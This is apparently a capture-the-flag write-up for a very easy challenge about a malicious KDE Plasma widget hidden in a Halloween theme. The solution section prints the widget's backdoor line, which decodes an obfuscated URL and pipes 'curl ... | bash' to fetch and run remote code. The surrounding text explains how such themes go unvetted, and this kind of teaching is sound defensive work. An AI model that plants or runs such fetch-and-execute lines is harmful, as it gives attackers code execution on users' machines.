84 lines
3.3 KiB
Markdown
84 lines
3.3 KiB
Markdown
![](assets/banner.png)
|
|
|
|
<img src='assets/htb.png' style='margin-left: 20px; zoom: 80%;' align=left /> <font size='10'>Sp00ky Theme</font>
|
|
|
|
05<sup>th</sup> Oct 2024 / Document No. D24.102.XX
|
|
|
|
Prepared By: c4n0pus
|
|
|
|
Challenge Author(s): c4n0pus
|
|
|
|
Difficulty: <font color=Green>Very Easy</font>
|
|
|
|
Classification: Official
|
|
|
|
# Synopsis
|
|
|
|
* A very easy challenge that features a malicious Plasma 6 plasmoid (widget) that executes rogue commands
|
|
|
|
## Description
|
|
|
|
* I downloaded a very nice haloween global theme for my Plasma installation and a couple of widgets! It was supposed to keep the bad spirits away while I was improving my ricing skills... Howerver, now strange things are happening and I can't figure out why...
|
|
|
|
## Skills Required
|
|
|
|
* N/A
|
|
|
|
## Skills Learned
|
|
|
|
* Plasma Themes
|
|
* Obscure Linux Backdoors
|
|
|
|
# Enumeration
|
|
|
|
We are given a zip file that contains a folder called `plasma` and inside it contains a couple of directories
|
|
|
|
* `look-and-feel`
|
|
* `plasmoids`
|
|
* `desktoptheme`
|
|
|
|
The `look-and-feel` directory stores the Global Theme configuration for each global theme.
|
|
The `plasmoid` directory contains the downloaded widgets (either manually or as a dependency for a global theme)
|
|
|
|
Recendly there was quite a big controversy where a user installed a Global Theme and it ended up deleting their `$HOME` folder! More about it, and how it happened [here](https://www.reddit.com/r/openSUSE/comments/1biunsl/hacked_installed_a_global_theme_it_erased_all_my/)
|
|
|
|
As it turns out, the widgets have a direct access to execute arbitrary commands because that's inherently their function! ie: getting CPU usage using `cat /proc/stat` and then aggregating it using `awk` and passing it to the widget for styling and display.
|
|
|
|
But what happens if a malicious actor creates a theme and publishes it without any vetting? The above theme did not have any malicious intentions (allegedly), just a versioning issue that created a weird command line that removed the home folder. Regardless, the issue here was the lack of vetting, might as well being a malicious command.
|
|
|
|
# Solution
|
|
|
|
Navigaing into the `plasmoids` folder and then into the `netspeedWidget` folder we find the `metadata.json` file and `contents` folder. After digging around we find these two lines in the `utils.js` file:
|
|
|
|
```js
|
|
const NET_DATA_SOURCE =
|
|
"awk -v OFS=, 'NR > 2 { print substr($1, 1, length($1)-1), $2, $10 }' /proc/net/dev";
|
|
|
|
const PLASMOID_UPDATE_SOURCE =
|
|
"UPDATE_URL=$(echo =0nbzAHc0g2XuRzYfRXMf9TIzNTbzgGdflnYfR2M3B3eCRFS | rev | base64 -d); curl $UPDATE_URL:1992/update_sh | bash"
|
|
```
|
|
|
|
The first one aggregates all traffic from all network interfaces as so:
|
|
|
|
```bash
|
|
$> awk -v OFS=, 'NR > 2 { print substr($1, 1, length($1)-1), $2, $10 }' /proc/net/dev
|
|
|
|
lo,78647312,78647312
|
|
wlo1,12638777329,734054168
|
|
tailscale0,2408137,3591611
|
|
vboxnet0,0,56383
|
|
```
|
|
|
|
Then it's up to the widget to parse it furhter.
|
|
|
|
The next command seemingly defines an update URL and then curls some data from it and pipes it to bash!
|
|
|
|
Running the command that creates the URL reveals the flag!
|
|
|
|
```bash
|
|
$> echo =0nbzAHc0g2XuRzYfRXMf9TIzNTbzgGdflnYfR2M3B3eCRFS | rev | base64 -d
|
|
|
|
HTB{REDACTED}
|
|
```
|
|
|
|
In responde the KDE devs removed the Theme in Question, issued a [response](http://blog.davidedmundson.co.uk/blog/kde-store-content/) and urged users to report any wrongdoing in the KDE Store.
|